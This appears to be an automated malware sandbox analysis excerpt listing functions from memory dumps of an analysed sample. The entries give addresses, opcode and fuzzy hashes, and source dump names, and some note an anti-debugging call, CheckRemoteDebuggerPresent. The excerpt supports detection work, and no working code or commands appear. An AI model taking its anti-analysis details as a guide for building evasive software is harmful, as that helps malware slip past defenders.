Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c795ed847490a575ae5c04c91365a150ba5eca9f9fa002144b42077a63ce73ae
Instruction ID: 211f9329b5513e0c640fd4c8af0f9b705c37ad7db2bfdf4bc58ea62269d072ab
Opcode Fuzzy Hash: c795ed847490a575ae5c04c91365a150ba5eca9f9fa002144b42077a63ce73ae
Instruction Fuzzy Hash: A4B2EB20F1861D0FEB84F77C446A27976C2BF89690B551979F44EC7297ED2CEC228782

Function 00007FF886FD5511 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF886FD55C0

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: b7248de38e5a2e74b0dccb4939baf679003179dddc157cde2e19bd5500d95648
Instruction ID: 7f190b9f3d3c505c6b95316742274048a6143068b775152f6e6cb63342732c0c
Opcode Fuzzy Hash: b7248de38e5a2e74b0dccb4939baf679003179dddc157cde2e19bd5500d95648
Instruction Fuzzy Hash: E231003190875C8FCB59DF98C84A7E97BE0FF65321F04426BD489D7292DB34A846CB91

Function 00007FF88714F729 Relevance: 1.6, Strings: 1, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}, xrefs: 00007FF88714F6E9

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: }
API String ID: 0-4239843852
Opcode ID: b4dcc691fde890781255642053b20c7b55ef8c3950c94a312b0a85d36a0674dc
Instruction ID: 34a2e5d93f1ee1d8f097c6f8af7b9e2590f9cd1b41b6401ea7dec784e9c41599
Opcode Fuzzy Hash: b4dcc691fde890781255642053b20c7b55ef8c3950c94a312b0a85d36a0674dc
Instruction Fuzzy Hash: 13B12825EACA4A8BE7599638405537D7AE3FF85790F59017CE48EC36D2DE2CA8438341

Function 00007FF88714EFA0 Relevance: 1.6, Strings: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

24_H, xrefs: 00007FF88714F271

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: 24_H
API String ID: 0-488647235
Opcode ID: 0f8a32c0ba920b911474fa98a5d679b89320c7547301b0d03d43f1c76c3a6fc1
Instruction ID: 0744d215ff908f1b3b56ffe3b8f44c0fa83181c4b2596f132c1530f356864956
Opcode Fuzzy Hash: 0f8a32c0ba920b911474fa98a5d679b89320c7547301b0d03d43f1c76c3a6fc1
Instruction Fuzzy Hash: 35A16B22E6CA4A8FE744FB7CE4452F937E2FF95369B08417AD04CC7293DD18A8458781

Function 00007FF88714EC90 Relevance: .8, Instructions: 798COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d61d37cccf51be0aeb097b23449978d22f574b0389d5940bb4752d151fed535
Instruction ID: f47cb459836aeadb22c11b94f09f6e93b905124f8cde4a1ef71a57307a643292
Opcode Fuzzy Hash: 5d61d37cccf51be0aeb097b23449978d22f574b0389d5940bb4752d151fed535
Instruction Fuzzy Hash: 3A32E431F5CA498FEB98EB2C94866BD77E1FF98744F0401BAD04DC7292DE24AC468741

Function 00007FF886FF0C90 Relevance: .6, Instructions: 619COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0da39bcadbec52155ae153267f2ec46afe1840394f447f92f059710821fc5b
Instruction ID: d9d9fe6ff08381e43d9ff989a68d96ce215cba38cbe7976e74545ccdd69d1776
Opcode Fuzzy Hash: fd0da39bcadbec52155ae153267f2ec46afe1840394f447f92f059710821fc5b
Instruction Fuzzy Hash: C5020631E5C71A8FEB58AA689485679B3D1FF49754F10057DE49EC3293ED28FC02C291

Function 00007FF88715D780 Relevance: .5, Instructions: 533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6149c430f8ff9ffb7f253016f079b68a186f8ab94ff54d20c8abee161df894
Instruction ID: 69f424d8af1b2945d3b66f1fba79fd4ac4025b251e0743818b03042f6aa2759a
Opcode Fuzzy Hash: 4c6149c430f8ff9ffb7f253016f079b68a186f8ab94ff54d20c8abee161df894
Instruction Fuzzy Hash: 75E11835F5C9494FEB58EB2C94996BD3BE2FF99754B04007AE44DC3292DD28AC45C381

Function 00007FF887120090 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e4b6c0660d0a5ab6fd5148a2aaa3359fcaee0a6fba1dee54f624cd03e3d1d3
Instruction ID: 2ee243fe84bf6e03291ae53b38f8469b71e9f94f9eab2f41e85d99941b4eceab
Opcode Fuzzy Hash: 73e4b6c0660d0a5ab6fd5148a2aaa3359fcaee0a6fba1dee54f624cd03e3d1d3
Instruction Fuzzy Hash: ADE12431E6C64A0FE758EA6C545227D7BE1FF99790F11017DE49EC3693ED2CAC428282

Function 00007FF886FD2326 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caeadcd1727760d0a00fdaf2a77985cec06fe081b09eede7e8dcbb87c2f92703
Instruction ID: 273c249a93b2bc87e0d900f92b7203f96b13b402988ce518282e1f974ba161c3
Opcode Fuzzy Hash: caeadcd1727760d0a00fdaf2a77985cec06fe081b09eede7e8dcbb87c2f92703
Instruction Fuzzy Hash: EAF19430918A4D8FEBA8DF28C8567E937D1FF55350F04426AD84DC7296DB38A945CB82

Function 00007FF886FD30D2 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2fef4517b7bc1a6554ed42e1c332f3f5051c48756a5e80573148e2f39535834
Instruction ID: b1edf15dad989c7b25ea6727c4bc4cf0244019b41a737cf92c970b1cf7ed323d
Opcode Fuzzy Hash: c2fef4517b7bc1a6554ed42e1c332f3f5051c48756a5e80573148e2f39535834
Instruction Fuzzy Hash: 90E1C331908A4E8FEBA8DF28C8567E977D1FB55350F14426AD84DC7292CF78E944CB82

Function 00007FF88714DC40 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc208380684f06bcf435acb3538ef87bfe46544b88101f119a5e0bf70139d0a
Instruction ID: bbf15be4ec9dbeb0f0127acb82ef7025a85de68959fb406a438fecde7cf169cd
Opcode Fuzzy Hash: ddc208380684f06bcf435acb3538ef87bfe46544b88101f119a5e0bf70139d0a
Instruction Fuzzy Hash: 2FA1F525E5CA874FE788EE68886577D7BE2FF85790F140079D44EC76C2DE2CA8468342

Function 00007FF88714EDFA Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b0aeb2dccb27c42d74451978075c90be22be273cdb97ee61426067cf6833f2
Instruction ID: 7ae855b060a2cc22788db285add7840d1da8b312e6ef1b1abcc1264ad9a484ac
Opcode Fuzzy Hash: c5b0aeb2dccb27c42d74451978075c90be22be273cdb97ee61426067cf6833f2
Instruction Fuzzy Hash: B89127279586669AD300BEFCF8462E63790EF8137E708923BD0CC9D453DD1C608A9BC6

Function 00007FF887142825 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cbb4602db0d43fdc6f6d37b6e398db3c7a0599a44be2e3965191bda4b20b6a
Instruction ID: aa98bea036e21b9f188465f072bdd9e662822798567bef846c167eb1c6bc0524
Opcode Fuzzy Hash: d9cbb4602db0d43fdc6f6d37b6e398db3c7a0599a44be2e3965191bda4b20b6a
Instruction Fuzzy Hash: 1BA10331A4CA558FE7A8DA28C4517BA7BE2FF59354F00017DD48EC7AD2DE28A885C341

Function 00007FF8871200D8 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f55052f1ac32665d535b648d706acd716762aa52881f818eb8d4a3f3e7b049
Instruction ID: eb0da10fd0f05c9c48532ae9e8288431b828f9cd1588e9606dee91d49f6789b4
Opcode Fuzzy Hash: 05f55052f1ac32665d535b648d706acd716762aa52881f818eb8d4a3f3e7b049
Instruction Fuzzy Hash: 17812937A5C55A8BD318BAACF4426FD7790EF85779B00033BD08DDA583DE18644A8BC6

Function 00007FF887002650 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea4aba4c9b0291d7a43de932abd19df566ba58014b4eea70319ce73e7cdb8b6
Instruction ID: d46091a6cbde47395a28ca9418876449d7c5a75b693bffee3d11fbd66a3660bb
Opcode Fuzzy Hash: 0ea4aba4c9b0291d7a43de932abd19df566ba58014b4eea70319ce73e7cdb8b6
Instruction Fuzzy Hash: 5D714830C9C65A0AEB7C9568B84627A76D4FB06774F20117DD8DFC3683FC19AC978286

Function 00007FF887121D0C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c57f8796cc8ec059136a5302727a5fa6455e6be6e7739766ffa11c9a238034
Instruction ID: e45482267496a18524b7851284ff5142649a9598e0683b7ac7892503aad4d742
Opcode Fuzzy Hash: e4c57f8796cc8ec059136a5302727a5fa6455e6be6e7739766ffa11c9a238034
Instruction Fuzzy Hash: AF612736C6C25E4EF664E9ACA8862F9B7D4FF12368F040239D59D82583FD09FC5641C6

Function 00007FF88712D060 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dd5bfc3dd56b528e4d6523087cd2b89d74370abbadd5c8d6b35909abc64f6d7
Instruction ID: a1c1aab2a2492d06890a21ccb8ca395aaf754471b8dab7dc6b766dca012f8fc4
Opcode Fuzzy Hash: 2dd5bfc3dd56b528e4d6523087cd2b89d74370abbadd5c8d6b35909abc64f6d7
Instruction Fuzzy Hash: 6141D825A2C7490FE769C628886173ABFE1FB97360F55017FD58AC39D2ED486C42C342

Function 00007FF886FC2F15 Relevance: 1.7, APIs: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF886FD55C0

Memory Dump Source

Source File: 00000002.00000002.1535098433.00007FF886FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff886fc0000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: ee7771e3f7084326ff097c79385bc544513be085c959f3a7d4545c342da34ff8
Instruction ID: 62d49736570db23ce9d67c8d8b819be96587b403f03f12fc2db1190c9f124f0a
Opcode Fuzzy Hash: ee7771e3f7084326ff097c79385bc544513be085c959f3a7d4545c342da34ff8
Instruction Fuzzy Hash: 67412B3190C7988FDB16DF9CD8466E97FF0EF66310F0541AFC485D7192D6246846CB91

Function 00007FF887139C31 Relevance: 1.4, Instructions: 1414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148b6d8c12dce13c612826c87d3761d45ef79b98f342b803dbd6c02af1760f48
Instruction ID: ab4992c8116c0eea1f122cb2acce99dd6ba27b5cab632e31d7ccc9d925df0088
Opcode Fuzzy Hash: 148b6d8c12dce13c612826c87d3761d45ef79b98f342b803dbd6c02af1760f48
Instruction Fuzzy Hash: 3F92FB20F1861D4FEB84F7BC406A26876C2FF99790F5509B9A44EC7297DD2CEC528782

Function 00007FF88714DC45 Relevance: 1.4, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[ , xrefs: 00007FF88714DC50

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-2249208011
Opcode ID: 2fab593ba22894ed125a976ca35cf3b47f4304ff4aae6af1419a6843c4685916
Instruction ID: 5ba2d8659fc7fb1e0552bb75e5e7b1855f9189e1175670c97723f2cd6df519eb
Opcode Fuzzy Hash: 2fab593ba22894ed125a976ca35cf3b47f4304ff4aae6af1419a6843c4685916
Instruction Fuzzy Hash: 78414C30A6C6558BE358A738401657E7BF2FF86391F04047EE48DC36D2DE29A842C341

Function 00007FF88714FD52 Relevance: 1.4, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 00007FF88714FD6E

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 79ccdef6db8a231000738d3a85aaa98fcb6ebb7f70973e8bdb19bbf53fbd40f3
Instruction ID: 3a5aaf67cfb1a2136ad5087cef4ca26b5e67eda3ba46a9fd9a509ab749976e89
Opcode Fuzzy Hash: 79ccdef6db8a231000738d3a85aaa98fcb6ebb7f70973e8bdb19bbf53fbd40f3
Instruction Fuzzy Hash: 83314B34AAC7568AE7A8576850512BE7AF3FF85391F08047DD48EC37D3DD2DA8429342

Function 00007FF88714DC38 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

[ , xrefs: 00007FF88714FBFF

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-2249208011
Opcode ID: f8c924cfe456fe7e0ad5044302c42104d56d2ff47ae31662c405bf5108fb47cf
Instruction ID: 6d46aeecdf5869a596606218f5c241798b2e5978e509402f68507f34c04e1845
Opcode Fuzzy Hash: f8c924cfe456fe7e0ad5044302c42104d56d2ff47ae31662c405bf5108fb47cf
Instruction Fuzzy Hash: FE01FC348AC7058ED7549B24801127E7BF1BF49388F08097DE48DD26E2CF689A81C742

Function 00007FF88714FBD8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

[ , xrefs: 00007FF88714FBFF

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-2249208011
Opcode ID: 8bc24d1e85130f068468777761282855c0201302a140b8161b3d0002a5583655
Instruction ID: 8b4fe14d75386ed302e335b18a579b72b8b382ffe8b97ba1f14b72982ec32f83
Opcode Fuzzy Hash: 8bc24d1e85130f068468777761282855c0201302a140b8161b3d0002a5583655
Instruction Fuzzy Hash: 4EE086180AD6A149D615972050024FD7BB16F49299F0C0C9DF8CC976D3D94D5642C386

Function 00007FF88713A94F Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b3f1b30896b469455d8ca9c85abb281eb6cf82ffbed53de59db76b39d7cc2e
Instruction ID: 8281154cf0389896a5b088f118faa6c6738fd746b5c7f97ec049a6a117d5be50
Opcode Fuzzy Hash: d0b3f1b30896b469455d8ca9c85abb281eb6cf82ffbed53de59db76b39d7cc2e
Instruction Fuzzy Hash: B042EA20F18A1D4FDB84F7BC406A66872C2FF98790F5509B9A44EC7297DD2DEC528782

Function 00007FF88714A6C8 Relevance: .8, Instructions: 791COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 884f00558c3da311b8e0444478f6ee23e70ebfadd15c23130c241415f896668e
Instruction ID: 4f007434e5ce4fe30fc6b799dc01aa8f0d99aa91568af3a3760bc330ca2f8a02
Opcode Fuzzy Hash: 884f00558c3da311b8e0444478f6ee23e70ebfadd15c23130c241415f896668e
Instruction Fuzzy Hash: 4C421934E5861A8FEB94EB7884566ACB7E2FF58740F5005B9E04DD7292DE38EC81CB41

Function 00007FF887139505 Relevance: .7, Instructions: 706COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b877fd7139f1f0d8796fccd4562d79087a14fd5555b7cb64da7f2048eab2180
Instruction ID: e8a9f8a6f8be24cee90178369dcdaddc54a9c9f513a940eecde22c74bfdf940a
Opcode Fuzzy Hash: 5b877fd7139f1f0d8796fccd4562d79087a14fd5555b7cb64da7f2048eab2180
Instruction Fuzzy Hash: E8224930E1C7194BEA54BB78945627D77D1FF89780F400979E88EC7297EE2DEC028682

Function 00007FF8871508F8 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d2ecf7790dd80301a4183bbc98e40d38006a81fcc59762ed017cfc7b059263
Instruction ID: 049dfe3455c1cd44380d382eee25d5969265fd47b61d71685f4d6ec087abe7c3
Opcode Fuzzy Hash: a2d2ecf7790dd80301a4183bbc98e40d38006a81fcc59762ed017cfc7b059263
Instruction Fuzzy Hash: 33325C74A88859CFEBA9EB6CC858BA937F1FF68744F1400A4D50DD76A5DA34EC81CB10

Function 00007FF887125ADC Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3c8edf80c384d03d3e20c0dd9df66b2b0a859eeedd23e99a9d400d8e442305
Instruction ID: 3e027f11f218e0e5d49f157ccc32ee6425bbb6202dec8bef5e2be7780fef2578
Opcode Fuzzy Hash: fd3c8edf80c384d03d3e20c0dd9df66b2b0a859eeedd23e99a9d400d8e442305
Instruction Fuzzy Hash: 3422F330E186198FEB54EBA888567ACB6E1FF48340F5005B9E44DE7293DE38ED81CB45

Function 00007FF887120208 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3629881f1c56b6aebfda2390e0aa305c3f844f3e699f49eeca507f6edb04055
Instruction ID: ab75e116175575a3cb2b89c7a5e697a0972393caaf28eb078fcde5adb2d3b044
Opcode Fuzzy Hash: b3629881f1c56b6aebfda2390e0aa305c3f844f3e699f49eeca507f6edb04055
Instruction Fuzzy Hash: 8B026430E286198FEB54FB7894566ADB7E1FF48744F1006BAE04DD7287DE38A841CB46

Function 00007FF887134A7C Relevance: .5, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ab5fc46b2a3ac4d9140a02d27e864bbfb5aa494f7421e8bde883f689d2cb72
Instruction ID: 07fa4179fc9f989d6dbe5c1bea5ac160de5d334934ce7043647e09f029d48630
Opcode Fuzzy Hash: 90ab5fc46b2a3ac4d9140a02d27e864bbfb5aa494f7421e8bde883f689d2cb72
Instruction Fuzzy Hash: C3E13B30E586198FEB44BBB884566BC77E2FF88784B540579E44EC7292ED3CEC428781

Function 00007FF88712741C Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068ce82736b6b908d12bbbb8a564032682d0bd90597ef44eeb5eaf248ad11d35
Instruction ID: 22c605c6101d97d1edfc9fe104a72d266305c5e5084d0869fd5822ae60a05d49
Opcode Fuzzy Hash: 068ce82736b6b908d12bbbb8a564032682d0bd90597ef44eeb5eaf248ad11d35
Instruction Fuzzy Hash: 36F1F430E1861D8FEB44ABB884566ADB7E2FF48740F5045B9E44DD7293DE38AC42CB46

Function 00007FF8871221FC Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bafc460ec732699fa314542cf9c928e038fc7ea3a920a357a173a4f9cec580b
Instruction ID: 408fbe5ac1b3b7959485f378d069bc15bef9200676ab37c521527c533b86e6a4
Opcode Fuzzy Hash: 9bafc460ec732699fa314542cf9c928e038fc7ea3a920a357a173a4f9cec580b
Instruction Fuzzy Hash: C9D1D535E6CA1D4FDB94EA2C94466BD77E1FF98790F000679D45EC3242EE28AC828781

Function 00007FF887120078 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536146471.00007FF887120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff887120000_17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3e59065f130dd162a810aee9fd16dd98f3bae7f2b746947951421ff4a50586
Instruction ID: 460703de8107cecf9df3ab8fe0e808657d0a9bda631c9b1a4321ea1c52b4b8d4
